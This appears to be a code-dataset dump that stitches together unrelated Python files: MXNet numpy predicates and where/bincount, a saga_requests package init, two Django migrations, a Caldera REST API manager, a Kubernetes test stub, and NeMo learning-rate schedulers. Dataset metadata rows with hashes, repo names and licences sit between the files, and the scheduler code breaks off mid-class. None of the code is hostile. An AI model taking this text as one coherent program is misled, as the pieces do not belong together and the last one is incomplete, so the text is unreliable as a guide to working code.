def isinf(x, out=None, **kwargs):
    """Test element-wise for positive or negative infinity."""
    return _unary_func_helper(x, _npi.isinf, _np.isinf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isposinf(x, out=None, **kwargs):
    """Test element-wise for positive infinity.

    Fixes: adds the ``@set_module`` decorator carried by every sibling
    unary predicate here (isnan, isinf, isneginf, isfinite) — it was missing.
    """
    return _unary_func_helper(x, _npi.isposinf, _np.isposinf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isneginf(x, out=None, **kwargs):
    """Test element-wise for negative infinity."""
    return _unary_func_helper(x, _npi.isneginf, _np.isneginf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isfinite(x, out=None, **kwargs):
    """Test element-wise for finiteness (neither NaN nor infinity)."""
    return _unary_func_helper(x, _npi.isfinite, _np.isfinite, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def where(condition, x=None, y=None):
    """Return elements chosen from x or y depending on condition.

    With only `condition` given, behaves like ``nonzero(condition)``.
    """
    if x is None and y is None:
        return nonzero(condition)
    else:
        if isinstance(condition, numeric_types):
            # Scalar condition: pick one branch outright.
            if condition != 0:
                return x
            else:
                return y
        else:
            if isinstance(x, numeric_types) and isinstance(y, numeric_types):
                return _npi.where_scalar2(condition, float(x), float(y), out=None)
            elif isinstance(x, NDArray) and isinstance(y, NDArray):
                return _npi.where(condition, x, y, out=None)
            elif isinstance(y, NDArray):
                # x is a scalar ("left scalar" variant).
                return _npi.where_lscalar(condition, y, float(x), out=None)
            elif isinstance(x, NDArray):
                # y is a scalar ("right scalar" variant).
                return _npi.where_rscalar(condition, x, float(y), out=None)
            else:
                raise TypeError('type {0} and {1} not supported'.format(str(type(x)), str(type(y))))
@set_module('mxnet.ndarray.numpy')
def polyval(p, x):
    """Evaluate a polynomial with coefficients p at points x (both ndarray or both host values)."""
    from ...numpy import ndarray
    if isinstance(p, ndarray) and isinstance(x, ndarray):
        return _npi.polyval(p, x)
    elif not isinstance(p, ndarray) and not isinstance(x, ndarray):
        return _np.polyval(p, x)
    else:
        raise TypeError('type not supported')
@set_module('mxnet.ndarray.numpy')
def bincount(x, weights=None, minlength=0):
    """Count occurrences of each value in an array of non-negative ints.

    Args:
        x: input NDArray of non-negative integers.
        weights: optional per-element weights, same shape as x.
        minlength: minimum number of bins in the output (must be >= 0).
    """
    if not isinstance(x, NDArray):
        raise TypeError("Input data should be NDarray")
    if minlength < 0:
        # Bug fix: the guard rejects negative values, but the old message
        # claimed "should greater than 0" — wrong bound and ungrammatical.
        raise ValueError("Minlength should be non-negative")
    if weights is None:
        return _npi.bincount(x, minlength=minlength, has_weights=False)
    return _npi.bincount(x, weights=weights, minlength=minlength, has_weights=True)
| true | true |
f7236591419eeb6e4e4a15c30657c248c82b020e | 340 | py | Python | saga_requests/__init__.py | titans55/saga-requests | 39c83a14ece3bace6235ca4ade47a462218b6846 | [
"MIT"
] | null | null | null | saga_requests/__init__.py | titans55/saga-requests | 39c83a14ece3bace6235ca4ade47a462218b6846 | [
"MIT"
] | null | null | null | saga_requests/__init__.py | titans55/saga-requests | 39c83a14ece3bace6235ca4ade47a462218b6846 | [
"MIT"
] | null | null | null | __title__ = 'saga_requests'
__description__ = 'Saga pattern implementation for sequential HTTP requests.'
__author__ = 'Kutay Aslan'
__author_email__ = 'kutay.aslan97@gmail.com'
__license__ = 'MIT'
__copyright__ = 'Copyright 2021 Kutay Aslan'
from .saga_requests import SagaBuilder, SagaAction, SagaRequest, SagaRequestKwargs, SagaContext
| 37.777778 | 95 | 0.811765 | __title__ = 'saga_requests'
__description__ = 'Saga pattern implementation for sequential HTTP requests.'
__author__ = 'Kutay Aslan'
__author_email__ = 'kutay.aslan97@gmail.com'
__license__ = 'MIT'
__copyright__ = 'Copyright 2021 Kutay Aslan'
from .saga_requests import SagaBuilder, SagaAction, SagaRequest, SagaRequestKwargs, SagaContext
| true | true |
f72365d1a8d8b966f5901dc54dc01c7786bf2df8 | 650 | py | Python | msgboard/migrations/0001_initial.py | jeniaSakirko/beyond-tutorial | cd847d5af53bd385d0741941216b965d29019999 | [
"MIT"
] | null | null | null | msgboard/migrations/0001_initial.py | jeniaSakirko/beyond-tutorial | cd847d5af53bd385d0741941216b965d29019999 | [
"MIT"
] | null | null | null | msgboard/migrations/0001_initial.py | jeniaSakirko/beyond-tutorial | cd847d5af53bd385d0741941216b965d29019999 | [
"MIT"
] | null | null | null | # Generated by Django 4.0.2 on 2022-02-06 14:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial migration for the msgboard app: creates the Message table."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Message',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('author', models.CharField(max_length=200)),
                ('text', models.TextField()),
                # Stamped with the current time when a message is created.
                ('date', models.DateTimeField(default=django.utils.timezone.now)),
            ],
        ),
    ]
| 26 | 117 | 0.586154 |
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Message',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=200)),
('text', models.TextField()),
('date', models.DateTimeField(default=django.utils.timezone.now)),
],
),
]
| true | true |
f72366d69928dd9d5365212ab55ce0ab33c99366 | 770 | py | Python | students/K33402/Kondrashov_Egor/LR2/commerce/auctions/migrations/0002_listing.py | emina13/ITMO_ICT_WebDevelopment_2021-2022 | 498a6138e352e7e0ca40d1eb301bc29416158f51 | [
"MIT"
] | 7 | 2021-09-02T08:20:58.000Z | 2022-01-12T11:48:07.000Z | students/K33402/Kondrashov_Egor/LR2/commerce/auctions/migrations/0002_listing.py | emina13/ITMO_ICT_WebDevelopment_2021-2022 | 498a6138e352e7e0ca40d1eb301bc29416158f51 | [
"MIT"
] | 76 | 2021-09-17T23:01:50.000Z | 2022-03-18T16:42:03.000Z | students/K33402/Kondrashov_Egor/LR2/commerce/auctions/migrations/0002_listing.py | emina13/ITMO_ICT_WebDevelopment_2021-2022 | 498a6138e352e7e0ca40d1eb301bc29416158f51 | [
"MIT"
] | 60 | 2021-09-04T16:47:39.000Z | 2022-03-21T04:41:27.000Z | # Generated by Django 3.0.6 on 2020-10-02 12:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Second migration for the auctions app: adds the Listing model."""
    dependencies = [
        ('auctions', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Listing',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=128)),
                ('description', models.TextField()),
                ('starting_bid', models.DecimalField(decimal_places=2, max_digits=15)),
                # Optional image; blank=True allows listings without one.
                ('image_url', models.URLField(blank=True)),
                ('category', models.CharField(max_length=64)),
            ],
        ),
    ]
| 30.8 | 114 | 0.571429 |
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auctions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Listing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=128)),
('description', models.TextField()),
('starting_bid', models.DecimalField(decimal_places=2, max_digits=15)),
('image_url', models.URLField(blank=True)),
('category', models.CharField(max_length=64)),
],
),
]
| true | true |
f723687904dbdb6f989fe5a914c859d639ace454 | 6,674 | py | Python | app/api/v2/managers/base_api_manager.py | mihaid-b/caldera | 90af73188a9865757c167efd31cbd87a8e6160b1 | [
"Apache-2.0"
] | null | null | null | app/api/v2/managers/base_api_manager.py | mihaid-b/caldera | 90af73188a9865757c167efd31cbd87a8e6160b1 | [
"Apache-2.0"
] | 2 | 2022-01-07T00:58:19.000Z | 2022-01-07T00:58:20.000Z | app/api/v2/managers/base_api_manager.py | mihaid-b/caldera | 90af73188a9865757c167efd31cbd87a8e6160b1 | [
"Apache-2.0"
] | null | null | null | import logging
import os
import uuid
import yaml
from marshmallow.schema import SchemaMeta
from typing import Any, List
from base64 import b64encode, b64decode
from app.utility.base_world import BaseWorld
DEFAULT_LOGGER_NAME = 'rest_api_manager'
class BaseApiManager(BaseWorld):
    """Shared CRUD helpers for v2 REST API managers over in-memory (RAM) and on-disk (YAML) objects."""
    def __init__(self, data_svc, file_svc, logger=None):
        # data_svc: in-memory object store; file_svc: YAML persistence; logger defaults to the module logger.
        self._data_svc = data_svc
        self._file_svc = file_svc
        self._log = logger or self._create_default_logger()
    @property
    def log(self):
        """Logger used by this manager."""
        return self._log
    def find_objects(self, ram_key: str, search: dict = None):
        """Find objects matching the given criteria"""
        for obj in self._data_svc.ram[ram_key]:
            if not search or obj.match(search):
                yield obj
    def find_object(self, ram_key: str, search: dict = None):
        """Return the first object matching the criteria, or None when nothing matches."""
        for obj in self.find_objects(ram_key, search):
            return obj
    def find_and_dump_objects(self, ram_key: str, search: dict = None, sort: str = None, include: List[str] = None,
                              exclude: List[str] = None):
        """Find matching objects, dump them with include/exclude filters, and sort by `sort`."""
        matched_objs = []
        for obj in self.find_objects(ram_key, search):
            dumped_obj = self.dump_object_with_filters(obj, include, exclude)
            matched_objs.append(dumped_obj)
        sorted_objs = sorted(matched_objs, key=lambda p: p.get(sort, 0))
        if sorted_objs and sort in sorted_objs[0]:
            # Float the configured default object for this ram_key to the front.
            return sorted(sorted_objs,
                          key=lambda x: 0 if x[sort] == self._data_svc.get_config(f"objects.{ram_key}.default") else 1)
        return sorted_objs
    @staticmethod
    def dump_object_with_filters(obj: Any, include: List[str] = None, exclude: List[str] = None) -> dict:
        """Dump `obj.display`, keeping only `include` keys and then dropping `exclude` keys."""
        dumped = obj.display
        if include:
            # Anything not explicitly included is added to the exclude set.
            exclude_attributes = list(set(dumped.keys()) - set(include))
            exclude = set(exclude + exclude_attributes) if exclude else exclude_attributes
        if exclude:
            for exclude_attribute in exclude:
                dumped.pop(exclude_attribute, None)
        return dumped
    def create_object_from_schema(self, schema: SchemaMeta, data: dict, access: BaseWorld.Access):
        """Deserialize `data` with `schema`, tag it with the caller's access level, and store it in RAM."""
        obj_schema = schema()
        obj = obj_schema.load(data)
        obj.access = self._get_allowed_from_access(access)
        return obj.store(self._data_svc.ram)
    async def create_on_disk_object(self, data: dict, access: dict, ram_key: str, id_property: str, obj_class: type):
        """Persist a new object to a YAML file (generating an id if absent) and load it into RAM."""
        obj_id = data.get(id_property) or str(uuid.uuid4())
        data[id_property] = obj_id
        file_path = await self._get_new_object_file_path(data[id_property], ram_key)
        allowed = self._get_allowed_from_access(access)
        await self._save_and_reload_object(file_path, data, obj_class, allowed)
        return next(self.find_objects(ram_key, {id_property: obj_id}))
    def _get_allowed_from_access(self, access) -> BaseWorld.Access:
        # Precedence: HIDDEN > BLUE > RED (RED is the fallback).
        if self._data_svc.Access.HIDDEN in access['access']:
            return self._data_svc.Access.HIDDEN
        elif self._data_svc.Access.BLUE in access['access']:
            return self._data_svc.Access.BLUE
        else:
            return self._data_svc.Access.RED
    def find_and_update_object(self, ram_key: str, data: dict, search: dict = None):
        """Update the first object matching `search` with `data`; returns the updated object."""
        for obj in self.find_objects(ram_key, search):
            new_obj = self.update_object(obj, data)
            return new_obj
    def update_object(self, obj: Any, data: dict):
        """Fill fields missing from `data` with the existing object's values, then replace it."""
        dumped_obj = obj.schema.dump(obj)
        for key, value in dumped_obj.items():
            if key not in data:
                data[key] = value
        return self.replace_object(obj, data)
    def replace_object(self, obj: Any, data: dict):
        """Deserialize `data` with the object's schema and store it, replacing the RAM copy."""
        new_obj = obj.schema.load(data)
        return new_obj.store(self._data_svc.ram)
    async def find_and_update_on_disk_object(self, data: dict, search: dict, ram_key: str, id_property: str, obj_class: type):
        """Update the first on-disk object matching `search`; returns the reloaded object."""
        for obj in self.find_objects(ram_key, search):
            new_obj = await self.update_on_disk_object(obj, data, ram_key, id_property, obj_class)
            return new_obj
    async def update_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type):
        """Merge `data` into the object's backing YAML file and reload it into RAM."""
        obj_id = getattr(obj, id_property)
        file_path = await self._get_existing_object_file_path(obj_id, ram_key)
        existing_obj_data = dict(self.strip_yml(file_path)[0])
        existing_obj_data.update(data)
        await self._save_and_reload_object(file_path, existing_obj_data, obj_class, obj.access)
        return next(self.find_objects(ram_key, {id_property: obj_id}))
    async def replace_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str):
        """Overwrite the object's backing YAML file with `data` and reload it into RAM."""
        obj_id = getattr(obj, id_property)
        file_path = await self._get_existing_object_file_path(obj_id, ram_key)
        await self._save_and_reload_object(file_path, data, type(obj), obj.access)
        return next(self.find_objects(ram_key, {id_property: obj_id}))
    async def remove_object_from_memory_by_id(self, identifier: str, ram_key: str, id_property: str):
        """Remove the object with the given id from the in-memory store."""
        await self._data_svc.remove(ram_key, {id_property: identifier})
    async def remove_object_from_disk_by_id(self, identifier: str, ram_key: str):
        """Delete the object's backing YAML file, if it exists."""
        file_path = await self._get_existing_object_file_path(identifier, ram_key)
        if os.path.exists(file_path):
            os.remove(file_path)
    @staticmethod
    async def _get_new_object_file_path(identifier: str, ram_key: str) -> str:
        """Create file path for new object"""
        return os.path.join('data', ram_key, f'{identifier}.yml')
    async def _get_existing_object_file_path(self, identifier: str, ram_key: str) -> str:
        """Find file path for existing object (by id)"""
        _, file_path = await self._file_svc.find_file_path(f'{identifier}.yml', location=ram_key)
        if not file_path:
            # Fall back to the canonical path for a new object of this kind.
            file_path = await self._get_new_object_file_path(identifier, ram_key)
        return file_path
    async def _save_and_reload_object(self, file_path: str, data: dict, obj_type: type, access: BaseWorld.Access):
        """Save data as YAML and reload from disk into memory"""
        await self._file_svc.save_file(file_path, yaml.dump(data, encoding='utf-8', sort_keys=False), '', encrypt=False)
        await self._data_svc.load_yaml_file(obj_type, file_path, access)
    @staticmethod
    def _create_default_logger():
        """Return the module default logger."""
        return logging.getLogger(DEFAULT_LOGGER_NAME)
    @staticmethod
    def _encode_string(s):
        """Base64-encode a text string, returning text."""
        return str(b64encode(s.encode()), 'utf-8')
    @staticmethod
    def _decode_string(s):
        """Base64-decode to a text string."""
        return str(b64decode(s), 'utf-8')
| 42.509554 | 126 | 0.677705 | import logging
import os
import uuid
import yaml
from marshmallow.schema import SchemaMeta
from typing import Any, List
from base64 import b64encode, b64decode
from app.utility.base_world import BaseWorld
DEFAULT_LOGGER_NAME = 'rest_api_manager'
class BaseApiManager(BaseWorld):
def __init__(self, data_svc, file_svc, logger=None):
self._data_svc = data_svc
self._file_svc = file_svc
self._log = logger or self._create_default_logger()
@property
def log(self):
return self._log
def find_objects(self, ram_key: str, search: dict = None):
for obj in self._data_svc.ram[ram_key]:
if not search or obj.match(search):
yield obj
def find_object(self, ram_key: str, search: dict = None):
for obj in self.find_objects(ram_key, search):
return obj
def find_and_dump_objects(self, ram_key: str, search: dict = None, sort: str = None, include: List[str] = None,
exclude: List[str] = None):
matched_objs = []
for obj in self.find_objects(ram_key, search):
dumped_obj = self.dump_object_with_filters(obj, include, exclude)
matched_objs.append(dumped_obj)
sorted_objs = sorted(matched_objs, key=lambda p: p.get(sort, 0))
if sorted_objs and sort in sorted_objs[0]:
return sorted(sorted_objs,
key=lambda x: 0 if x[sort] == self._data_svc.get_config(f"objects.{ram_key}.default") else 1)
return sorted_objs
@staticmethod
def dump_object_with_filters(obj: Any, include: List[str] = None, exclude: List[str] = None) -> dict:
dumped = obj.display
if include:
exclude_attributes = list(set(dumped.keys()) - set(include))
exclude = set(exclude + exclude_attributes) if exclude else exclude_attributes
if exclude:
for exclude_attribute in exclude:
dumped.pop(exclude_attribute, None)
return dumped
def create_object_from_schema(self, schema: SchemaMeta, data: dict, access: BaseWorld.Access):
obj_schema = schema()
obj = obj_schema.load(data)
obj.access = self._get_allowed_from_access(access)
return obj.store(self._data_svc.ram)
async def create_on_disk_object(self, data: dict, access: dict, ram_key: str, id_property: str, obj_class: type):
obj_id = data.get(id_property) or str(uuid.uuid4())
data[id_property] = obj_id
file_path = await self._get_new_object_file_path(data[id_property], ram_key)
allowed = self._get_allowed_from_access(access)
await self._save_and_reload_object(file_path, data, obj_class, allowed)
return next(self.find_objects(ram_key, {id_property: obj_id}))
def _get_allowed_from_access(self, access) -> BaseWorld.Access:
if self._data_svc.Access.HIDDEN in access['access']:
return self._data_svc.Access.HIDDEN
elif self._data_svc.Access.BLUE in access['access']:
return self._data_svc.Access.BLUE
else:
return self._data_svc.Access.RED
def find_and_update_object(self, ram_key: str, data: dict, search: dict = None):
for obj in self.find_objects(ram_key, search):
new_obj = self.update_object(obj, data)
return new_obj
def update_object(self, obj: Any, data: dict):
dumped_obj = obj.schema.dump(obj)
for key, value in dumped_obj.items():
if key not in data:
data[key] = value
return self.replace_object(obj, data)
def replace_object(self, obj: Any, data: dict):
new_obj = obj.schema.load(data)
return new_obj.store(self._data_svc.ram)
async def find_and_update_on_disk_object(self, data: dict, search: dict, ram_key: str, id_property: str, obj_class: type):
for obj in self.find_objects(ram_key, search):
new_obj = await self.update_on_disk_object(obj, data, ram_key, id_property, obj_class)
return new_obj
async def update_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str, obj_class: type):
obj_id = getattr(obj, id_property)
file_path = await self._get_existing_object_file_path(obj_id, ram_key)
existing_obj_data = dict(self.strip_yml(file_path)[0])
existing_obj_data.update(data)
await self._save_and_reload_object(file_path, existing_obj_data, obj_class, obj.access)
return next(self.find_objects(ram_key, {id_property: obj_id}))
async def replace_on_disk_object(self, obj: Any, data: dict, ram_key: str, id_property: str):
obj_id = getattr(obj, id_property)
file_path = await self._get_existing_object_file_path(obj_id, ram_key)
await self._save_and_reload_object(file_path, data, type(obj), obj.access)
return next(self.find_objects(ram_key, {id_property: obj_id}))
async def remove_object_from_memory_by_id(self, identifier: str, ram_key: str, id_property: str):
await self._data_svc.remove(ram_key, {id_property: identifier})
async def remove_object_from_disk_by_id(self, identifier: str, ram_key: str):
file_path = await self._get_existing_object_file_path(identifier, ram_key)
if os.path.exists(file_path):
os.remove(file_path)
@staticmethod
async def _get_new_object_file_path(identifier: str, ram_key: str) -> str:
return os.path.join('data', ram_key, f'{identifier}.yml')
async def _get_existing_object_file_path(self, identifier: str, ram_key: str) -> str:
_, file_path = await self._file_svc.find_file_path(f'{identifier}.yml', location=ram_key)
if not file_path:
file_path = await self._get_new_object_file_path(identifier, ram_key)
return file_path
async def _save_and_reload_object(self, file_path: str, data: dict, obj_type: type, access: BaseWorld.Access):
await self._file_svc.save_file(file_path, yaml.dump(data, encoding='utf-8', sort_keys=False), '', encrypt=False)
await self._data_svc.load_yaml_file(obj_type, file_path, access)
@staticmethod
def _create_default_logger():
return logging.getLogger(DEFAULT_LOGGER_NAME)
@staticmethod
def _encode_string(s):
return str(b64encode(s.encode()), 'utf-8')
@staticmethod
def _decode_string(s):
return str(b64decode(s), 'utf-8')
| true | true |
f72369f01567bc9d574542797ebf82f8d4500910 | 903 | py | Python | kubernetes/test/test_auditregistration_api.py | iamneha/python | 5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0 | [
"Apache-2.0"
] | 1 | 2019-02-17T15:28:39.000Z | 2019-02-17T15:28:39.000Z | kubernetes/test/test_auditregistration_api.py | iamneha/python | 5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_auditregistration_api.py | iamneha/python | 5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.auditregistration_api import AuditregistrationApi
class TestAuditregistrationApi(unittest.TestCase):
    """ AuditregistrationApi unit test stubs """
    def setUp(self):
        # Build a fresh API client wrapper before every test.
        self.api = kubernetes.client.apis.auditregistration_api.AuditregistrationApi()
    def tearDown(self):
        # No per-test cleanup required for these generated stubs.
        pass
    def test_get_api_group(self):
        """
        Test case for get_api_group
        """
        pass
pass
if __name__ == '__main__':
unittest.main()
| 20.066667 | 105 | 0.708749 |
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.auditregistration_api import AuditregistrationApi
class TestAuditregistrationApi(unittest.TestCase):
def setUp(self):
self.api = kubernetes.client.apis.auditregistration_api.AuditregistrationApi()
def tearDown(self):
pass
def test_get_api_group(self):
pass
if __name__ == '__main__':
unittest.main()
| true | true |
f7236a746c46b2c1dbd28b9ceab6f34dcfd7b14b | 21,947 | py | Python | nemo/core/optim/lr_scheduler.py | mcdavid109/NeMo | a7df3e0271ab6133f7fe057ec697f764c8637d54 | [
"Apache-2.0"
] | null | null | null | nemo/core/optim/lr_scheduler.py | mcdavid109/NeMo | a7df3e0271ab6133f7fe057ec697f764c8637d54 | [
"Apache-2.0"
] | null | null | null | nemo/core/optim/lr_scheduler.py | mcdavid109/NeMo | a7df3e0271ab6133f7fe057ec697f764c8637d54 | [
"Apache-2.0"
] | 1 | 2020-12-18T14:23:37.000Z | 2020-12-18T14:23:37.000Z | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import dataclasses
import math
import warnings
from functools import partial
from typing import Any, Dict, Optional, Union
import hydra
import torch.optim as optim
import torch.optim.lr_scheduler as pt_scheduler
import torch.utils.data.dataloader as dataloader
from omegaconf import DictConfig, OmegaConf
from torch.optim.lr_scheduler import _LRScheduler
from nemo.core.config import SchedulerParams, get_scheduler_config, register_scheduler_params
from nemo.utils import logging
class WarmupPolicy(_LRScheduler):
    """Adds warmup kwargs and warmup logic to lr policy.
    All arguments should be passed as kwargs for clarity,
    Args:
        warmup_steps: Number of training steps in warmup stage
        warmup_ratio: Ratio of warmup steps to total steps
        max_steps: Total number of steps while training or `None` for
            infinite training
    """

    def __init__(self, optimizer, *, warmup_steps=None, warmup_ratio=None, max_steps=None, min_lr=0.0, last_epoch=-1):
        assert not (
            warmup_steps is not None and warmup_ratio is not None
        ), "Either use particular number of step or ratio"
        assert warmup_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"
        # It is necessary to assign all attributes *before* __init__,
        # as class is wrapped by an inner class.
        self.max_steps = max_steps
        if warmup_steps is not None:
            self.warmup_steps = warmup_steps
        elif warmup_ratio is not None:
            self.warmup_steps = int(warmup_ratio * max_steps)
        else:
            self.warmup_steps = 0
        self.min_lr = min_lr
        super().__init__(optimizer, last_epoch)

    def get_lr(self):
        if not self._get_lr_called_within_step:
            warnings.warn(
                "To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
            )
        step = self.last_epoch
        if step <= self.warmup_steps:
            # Linear ramp from base_lr/(warmup_steps+1) up to base_lr.
            lr_val = (step + 1) / (self.warmup_steps + 1)
            return [initial_lr * lr_val for initial_lr in self.base_lrs]
        # Bug fix: max_steps=None is documented as "infinite training", but the
        # original unconditional `step > self.max_steps` raised TypeError on None.
        if self.max_steps is not None and step > self.max_steps:
            return [self.min_lr for _ in self.base_lrs]
        return self._get_lr(step)

    def _get_lr(self, step):
        """Simple const lr policy"""
        return self.base_lrs
class WarmupHoldPolicy(WarmupPolicy):
    """Variant of WarmupPolicy which maintains high learning rate for a defined number of steps.
    All arguments should be passed as kwargs for clarity,
    Args:
        warmup_steps: Number of training steps in warmup stage
        warmup_ratio: Ratio of warmup steps to total steps
        hold_steps: Number of training steps to hold the learning rate after warm up
        hold_ratio: Ratio of hold steps to total steps
        max_steps: Total number of steps while training or `None` for
            infinite training
    """

    def __init__(
        self,
        optimizer,
        *,
        warmup_steps=None,
        warmup_ratio=None,
        hold_steps=None,
        hold_ratio=None,
        max_steps=None,
        min_lr=0.0,
        last_epoch=-1,
    ):
        assert not (hold_steps is not None and hold_ratio is not None), "Either use particular number of step or ratio"
        assert hold_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"
        self.min_lr = min_lr
        self._last_warmup_lr = 0.0
        # Necessary to duplicate as class attributes are hidden in inner class
        self.max_steps = max_steps
        if warmup_steps is not None:
            self.warmup_steps = warmup_steps
        elif warmup_ratio is not None:
            self.warmup_steps = int(warmup_ratio * max_steps)
        else:
            self.warmup_steps = 0
        # hold_steps is stored as an absolute step index: warmup + hold duration.
        if hold_steps is not None:
            self.hold_steps = hold_steps + self.warmup_steps
        elif hold_ratio is not None:
            self.hold_steps = int(hold_ratio * max_steps) + self.warmup_steps
        else:
            self.hold_steps = 0
        super().__init__(
            optimizer,
            warmup_steps=warmup_steps,
            warmup_ratio=warmup_ratio,
            max_steps=max_steps,
            last_epoch=last_epoch,
            min_lr=min_lr,
        )

    def get_lr(self):
        if not self._get_lr_called_within_step:
            warnings.warn(
                "To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
            )
        step = self.last_epoch
        # Warmup phase
        if step <= self.warmup_steps:
            lr_val = (step + 1) / (self.warmup_steps + 1)
            return [initial_lr * lr_val for initial_lr in self.base_lrs]
        # Hold phase
        if (step >= self.warmup_steps) and (step < self.hold_steps):
            return self.base_lrs
        # Bug fix: guard against max_steps=None (documented as "infinite
        # training"); the original comparison raised TypeError in that case.
        if self.max_steps is not None and step > self.max_steps:
            return [self.min_lr for _ in self.base_lrs]
        return self._get_lr(step)
def _squareroot_annealing(initial_lr, step, max_steps, min_lr):
mult = ((max_steps - step) / max_steps) ** 0.5
out_lr = initial_lr * mult
out_lr = max(out_lr, min_lr)
return out_lr
def _square_annealing(initial_lr, step, max_steps, min_lr):
mult = ((max_steps - step) / max_steps) ** 2
out_lr = initial_lr * mult
out_lr = max(out_lr, min_lr)
return out_lr
def _cosine_annealing(initial_lr, step, max_steps, min_lr):
mult = 0.5 * (1 + math.cos(math.pi * step / max_steps))
out_lr = (initial_lr - min_lr) * mult + min_lr
return out_lr
def _poly_decay(initial_lr, step, decay_steps, power, min_lr, cycle):
if cycle:
multiplier = 1.0 if step == 0 else math.ceil(step / decay_steps)
decay_steps *= multiplier
else:
step = min(step, decay_steps)
p = step / decay_steps
lr = (initial_lr - min_lr) * math.pow(1.0 - p, power)
lr += min_lr
return lr
class SquareAnnealing(WarmupPolicy):
    """Warmup followed by quadratic annealing of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=1e-5, last_epoch=-1, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Decay is computed over the post-warmup portion of training.
        decay_step = step - self.warmup_steps
        decay_span = self.max_steps - self.warmup_steps
        return [
            _square_annealing(initial_lr=base_lr, step=decay_step, max_steps=decay_span, min_lr=self.min_lr)
            for base_lr in self.base_lrs
        ]
class SquareRootAnnealing(WarmupPolicy):
    """Warmup followed by square-root annealing of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # NOTE(review): unlike the other policies, the decay here runs over the
        # full step range (no warmup offset) — presumably intentional; verify.
        return [
            _squareroot_annealing(initial_lr=base_lr, step=step, max_steps=self.max_steps, min_lr=self.min_lr)
            for base_lr in self.base_lrs
        ]
class CosineAnnealing(WarmupPolicy):
    """Warmup followed by cosine annealing of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Every base LR must sit at or above the floor, otherwise the cosine
        # interpolation below is meaningless.
        for base_lr in self.base_lrs:
            if base_lr < self.min_lr:
                raise ValueError(
                    f"{self} received an initial learning rate that " f"was lower than the minimum learning rate."
                )

        decay_step = step - self.warmup_steps
        decay_span = self.max_steps - self.warmup_steps
        return [
            _cosine_annealing(initial_lr=base_lr, step=decay_step, max_steps=decay_span, min_lr=self.min_lr)
            for base_lr in self.base_lrs
        ]
class WarmupAnnealing(WarmupPolicy):
    """Warmup followed by linear annealing of the LR towards zero at ``max_steps``."""

    def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        done = float(step / self.max_steps)
        warmup_frac = float(self.warmup_steps / self.max_steps)
        # Linear ramp from 1 (end of warmup) down to 0 (at max_steps), clamped at 0.
        scale = max((done - 1.0) / (warmup_frac - 1.0), 0.0)
        return [base_lr * scale for base_lr in self.base_lrs]
class InverseSquareRootAnnealing(WarmupPolicy):
    """Warmup followed by inverse-square-root decay of the LR."""

    def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, **kwargs, last_epoch=last_epoch, min_lr=min_lr)

